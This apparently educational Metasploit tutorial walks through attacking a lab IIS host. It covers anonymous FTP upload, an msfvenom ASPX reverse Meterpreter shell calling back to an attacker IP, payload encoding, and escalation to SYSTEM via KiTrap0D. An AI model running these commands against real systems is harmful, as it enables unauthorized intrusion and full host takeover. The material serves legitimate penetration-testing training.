💥 Introduction to MSFVenom

⚙️ Scenario: Gaining a Shell via FTP & Web Access

🧩 Setup

We discover:

📂 Anonymous FTP login is allowed
🌐 FTP root is exposed via a web service on port 80
⚙️ Web service runs Microsoft IIS
🔎 IIS can execute .aspx files → we can upload a reverse shell

🔎 Scanning the Target

$ nmap -sV -T4 -p- 10.10.10.5

Open Ports:

21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5

🔓 Logging in via FTP

$ ftp 10.10.10.5
Name: anonymous
Password: [any]

230 User logged in.

🗂️ Example Directory Listing:

03-17-17  welcome.png
aspnet_client/
iisstart.htm

✅ Indicates the ability to upload ASP.NET payloads

🛠️ Generating Payload with MSFVenom

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx

📌 Output:

Payload size: 341 bytes
Final file size: 2819 bytes
Format: ASPX
Architecture: x86

📡 Deploying the Payload

Upload reverse_shell.aspx to the FTP server and navigate to:

http://10.10.10.5/reverse_shell.aspx

⚠️ It will appear blank—but the payload executes silently in the background.

📞 Setting Up the Listener

$ msfconsole -q

msf6 > use multi/handler
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.14.5
msf6 > set LPORT 1337
msf6 > run

✅ Wait for the incoming connection...

🐚 Gaining Meterpreter Access

[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: IIS APPPOOL\Web

🎉 Success! You've gained a reverse Meterpreter shell.

⚠️ Session Dies Quickly?

Consider encoding the payload:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -e x86/shikata_ga_nai -f aspx > reverse_shell_encoded.aspx

🧪 Privilege Escalation with Local Exploit Suggester

🔍 Search & Use the Module

msf6 > search local exploit suggester
msf6 > use post/multi/recon/local_exploit_suggester
msf6 > set SESSION 2
msf6 > run

🧠 Based on system info and user, the module recommends multiple exploits.

Example findings:

bypassuac_eventvwr
ms10_015_kitrap0d
ms13_081_track_popup_menu

🔝 Using an Exploit: KiTrap0D

msf6 > use exploit/windows/local/ms10_015_kitrap0d
msf6 > set SESSION 3
msf6 > set LHOST 10.10.14.5
msf6 > set LPORT 1338
msf6 > run

🖥️ The exploit launches notepad, injects the payload, and spawns a new privileged shell.

[*] Meterpreter session 4 opened
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

✅ You now have SYSTEM-level access!

📚 Additional Resources

🔧 MSFVenom Payload Cheat Sheet
📖 Metasploit Unleashed by Offensive Security
📘 Metasploit: The Penetration Tester’s Guide – No Starch Press

Let me know if you want this exported into a .md file or need another section covered!

Previous🧠 Porting Scripts into Metasploit Modules Next🛡️ Firewall and IDS/IPS Evasion

Last updated 9 months ago

hashtag⚙️ Scenario: Gaining a Shell via FTP & Web Access

hashtag🧩 Setup

hashtag🔎 Scanning the Target

hashtag🔓 Logging in via FTP

hashtag🛠️ Generating Payload with MSFVenom

hashtag📡 Deploying the Payload

hashtag📞 Setting Up the Listener

hashtag🐚 Gaining Meterpreter Access

hashtag⚠️ Session Dies Quickly?

hashtag🧪 Privilege Escalation with Local Exploit Suggester

hashtag🔍 Search & Use the Module

hashtag🔝 Using an Exploit: KiTrap0D

hashtag📚 Additional Resources